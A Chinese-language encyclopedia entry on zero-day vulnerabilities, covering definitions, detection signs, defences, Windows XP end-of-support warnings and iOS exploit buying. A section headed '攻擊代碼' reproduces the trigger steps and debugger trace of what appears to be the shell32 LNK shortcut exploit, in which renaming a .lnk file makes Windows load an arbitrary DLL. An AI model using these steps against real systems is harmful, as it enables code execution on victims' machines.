零日漏洞

零日漏洞

零日漏洞(zero-day)又叫零時差攻擊,是指被發現後立即被惡意利用的安全漏洞。通俗地講,即安全補丁與瑕疵曝光的同一日內,相關的惡意程式就出現。這種攻擊利用目標缺少防範意識或缺少補丁,從而能夠造成巨大破壞。零日漏洞常常被在某一產品或協定中找到安全漏洞的黑客所發現。一旦它們被發現,零日漏洞攻擊就會迅速傳播,一般通過Internet中繼聊天或地下網站傳播。

基本信息

攻擊威脅

攻擊代碼攻擊代碼
利用漏洞的攻擊被設計為迅速傳播,感染數量越來越多的系統。攻擊由之前被動式的、傳播緩慢的檔案和宏病毒演化為利用幾天或幾小時傳播的更加主動的、自我傳播的電子郵件蠕蟲和混合威脅。

微軟可信賴計算部門(TrustworthyComputing)主管蒂姆•瑞恩斯(TimRains)稱:2012年7月至2013年7月間,作為受攻擊產品,WindowsXP系統曾45次出現在微軟的安全威脅公告中。其中有30個安全威脅同時影響到了Windows 7Windows 8

系統被發現存在漏洞後,由於原廠商需要時間確認漏洞的存在,需要時間評估漏洞的風險,也需要時間來確定漏洞修正的方法,實現該方法後還要驗證、評估和質檢,因此很難在當日就拿出補丁。由於廠商缺少補丁,而最終用戶又缺少防範意識,從而能夠造成巨大破壞。

發現方法

按照定義,有關“零日漏洞”攻擊的詳細信息只在攻擊被確定後才會出現。以下是當發生“零日漏洞”攻擊時將看到的重要跡象:發源於一台客戶機或伺服器的出乎意料的合法數據流或大量的掃描活動;合法連線埠上的意外數據流;甚至在安裝了最新的補丁程式後,受到攻擊的客戶機或伺服器仍發生類似活動。

防禦方法

預防
零日漏洞零日漏洞
良好的預防安全實踐是必不可少的。這些實踐包括謹慎地安裝和遵守適應業務與套用需要的防火牆政策,隨時升級防病毒軟體,阻止潛在有害的檔案附屬檔案,隨時修補所有系統抵禦已知漏洞。漏洞掃描是評估預防規程有效性的好辦法。實時保護

部署提供全面保護的入侵防護系統(IPS)。在考慮IPS時,尋找以下功能:網路級保護、套用完整性檢查、套用協定“徵求意見”(RFC)確認、內容確認和取證能力。

計畫的事件回響

即使在採用以上措施後,企業仍可能受到“零日漏洞”影響。周密計畫的事件回響措施以及包括關鍵任務活動優先次序在內的定義的規則和規程,對於將企業損失減少到最小程度至關重要。

防止傳播

這可以通過將連線惟一限制在滿足企業需要所必須的機器上。這樣做可以在發生初次感染後,減少利用漏洞的攻擊所傳播的範圍。

系統升級

對於Windows XP用戶來說,進行系統升級,或者可以選擇Windows 7,其功能與WindowsXP功能類似。

“零日漏洞”攻擊對於警惕性最高的系統管理人員來說也是一種挑戰。但是,部署到位的安全護保措施可以大大降低關鍵數據和系統面臨的風險。

攻擊代碼

From:
1.Unzipthefilesin'C:\'.StartaDbgVieworpasteaKDtoyourVM.
2.Rename'suckme.lnk_'to'suckme.lnk'andletthemagicdotherestofshell32.dll.
3.Lookatyourlogs.
TestedunderXPSP3.
kd>g
Breakpoint1hit
eax=00000001 ebx=00f5ee7cecx=0000c666edx=00200003esi=00000001edi=7c80a6e4
eip=7ca78712 esp=00f5e9c4ebp=00f5ec18iopl=0 nvupeiplnznaponc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202.SHELL32!_LoadCPLModule+0x10d:
001b:7ca78712ff15a0159d7c call dwordptr[SHELL32!_imp__LoadLibraryW(7c9d15a0)]ds:0023:7c9d15a0={kernel32!LoadLibraryW(7c80aeeb)}
kd>ddesp
00f5e9c4 00f5ee7c000a27bc00f5ee7800000000
00f5e9d4 000000200000000800f5ee7c00000000
00f5e9e4 000000000000007b0000000000000000
00f5e9f4 00200073002000e00000064c0000028c
00f5ea04 1530000a00000000003a00430064005c
00f5ea14 006c006c0064002e006c006c006d002e
00f5ea24 006e0061006600690073006500000074
00f5ea34 000906087c92005d0000000000000007
kd>db00f5ee7c
00f5ee7c 43003a005c006400-6c006c002e006400 C.:.\.d.l.l...d.
00f5ee8c 6c006c000000927c-c8f2f50000177202 l.l....|......r.
00f5ee9c 4bd20000d8f2f500-8bd2a17c00000000 K..........|....
00f5eeac ac809d7c30d80d00-34d80d00b8d70d00 ...|0...4.......
00f5eebc 9ad2a17c30d80d00-c8f2f50050401500 ...|0.......P@..
00f5eecc 5040150000000000-b800927c40b70c00 P@.........|@...
00f5eedc a8eff5004100927c-180709005d00927c ....A..|....]..|
00f5eeec c8f2f50000eff500-00000000b800927c ...............|
kd>kv
ChildEBPRetAddrArgstoChild
00f5ec187ca81a7400f5ee7c000a27bc00f5f2c4SHELL32!_LoadCPLModule+0x10d(FPO:[1,145,4])
00f5ee507ca8254300f5ee74000a27bc000a27c0SHELL32!CPL_LoadAndFindApplet+0x4a(FPO:[4,136,4])
00f5f2947cb56065000a25b4000a27bc000a27c0SHELL32!CPL_FindCPLInfo+0x46(FPO:[4,264,4])
00f5f2b87ca13714000000820000000000000104SHELL32!CCtrlExtIconBase::_GetIconLocationW+0x7b(FPO:[5,0,0])
00f5f2d47ca1d306000a25ac0000008200f5f570SHELL32!CExtractIconBase::GetIconLocation+0x1f(FPO:[6,0,0])
00f5f4107ca133b6000dd7e00000008200f5f570SHELL32!CShellLink::GetIconLocation+0x69(FPO:[6,68,4])
00f5f77c7ca03c88000dd7e0000000000015aa00SHELL32!_GetILIndexGivenPXIcon+0x9c(FPO:[5,208,4])
00f5f7a47ca0669300131c60000dd7e00015aa00SHELL32!SHGetIconFromPIDL+0x90(FPO:[5,0,4])
00f5fe207ca12db000131c640015aa0000000000SHELL32!CFSFolder::GetIconOf+0x24e(FPO:[4,405,4])
00f5fe407ca15e3c00131c6000131c640015aa00SHELL32!SHGetIconFromPIDL+0x20(FPO:[5,0,0])
00f5fe687ca03275000f80900014d5b00014a910SHELL32!CGetIconTask::RunInitRT+0x47(FPO:[1,2,4])
00f5fe8475f11b9a000f809075f11b1875f10000SHELL32!CRunnableTask::Run+0x54(FPO:[1,1,4])
00f5fee077f4959800155658000cb74877f4957bBROWSEUI!CShellTaskScheduler_ThreadProc+0x111(FPO:[1,17,0])
00f5fef87c937ac2000cb7487c98e4400014cfe0SHLWAPI!ExecuteWorkItem+0x1d(FPO:[1,0,4])
00f5ff407c937b0377f4957b000cb74800000000ntdll!RtlpWorkerCallout+0x70(FPO:[Non-Fpo])
00f5ff607c937bc500000000000cb7480014cfe0ntdll!RtlpExecuteWorkerRequest+0x1a(FPO:[3,0,0])
00f5ff747c937b9c7c937ae900000000000cb748ntdll!RtlpApcCallout+0x11(FPO:[4,0,0])
00f5ffb47c80b7290000000000edfce400edfce8ntdll!RtlpWorkerThread+0x87(FPO:[1,7,0])
00f5ffec000000007c9202500000000000000000kernel32!BaseThreadStart+0x37(FPO:[Non-Fpo])

涉及事件

微軟借黑客逼WindowsXP老用戶升級
零日漏洞零日漏洞
2013年8月17日,國外媒體報導,微軟向WindowsXP用戶發出警告稱,如果用戶在2014年4月8日之前停止使用WindowsXP並且升級到更高版本Windows作業系統,這些用戶就會面臨零日漏洞的威脅。微軟將在那個截止日期之後停止支持WindowsXP。這就意味著微軟將不再為WindowsXP發布補丁。
從安全的角度看,這意味著什麼?微軟可信計算部門主管蒂姆·瑞恩斯(TimRains)說:“在微軟為支持版本的Windows作業系統發布安全更新的第一個月,攻擊者將逆向工程這些補丁,找到安全漏洞,並且測試WindowsXP是否存在這些安全漏洞。如果有漏洞,攻擊者將開發利用這個安全漏洞的代碼以便利用WindowsXP中的安全漏洞。由於微軟不再提供補丁修復WindowsXP中的安全漏洞,WindowsXP實際上將永遠存在一個零日攻擊安全漏洞。”
零日攻擊安全漏洞是指黑客能夠在發布補丁修復安全漏洞之前攻擊一個作業系統的方法。由於微軟在2014年4月以後將永遠不修復WindowsXP的安全漏洞,黑客會找到影響WindowsXP的安全漏洞。
瑞恩斯稱,在2012年7月至2013年7月之間,微軟發布的安全補丁中有45個安全補丁影響到WindowsXP。其中30個補丁影響到Windows7和Windows8。
瑞恩斯承認,WindowsXP的一些保護措施將幫助緩解攻擊。第三方的防毒軟體也會提高一些保護。這裡的挑戰是,你將永遠不知道XP的可信計算基礎是否確實可信,因為了解公開平披露的WindowsXP零日攻擊安全漏洞的攻擊者可以利用這些代碼攻擊XP系統並且可能運行他們自己選擇的代碼。
正如瑞恩斯指出的那樣,惡意代碼將更加高級,用戶的XP將更容易受到攻擊,而不是減少攻擊。
網路安全公司出價百萬美元收購蘋果iOS9漏洞
2015年9月,蘋果iOS開發平台被“XCodeGhost木馬感染,導致大量iOS版本的套用軟體成為“惡意軟體”,這一重大事件,讓“蘋果iOS安全性超過安卓”的“神話”被徹底擊碎。
外媒報導,一家國外安全公司宣布,將最高花費300萬美元採購蘋果iOS9作業系統中的“零日漏洞”。

相關搜尋

熱門詞條

聯絡我們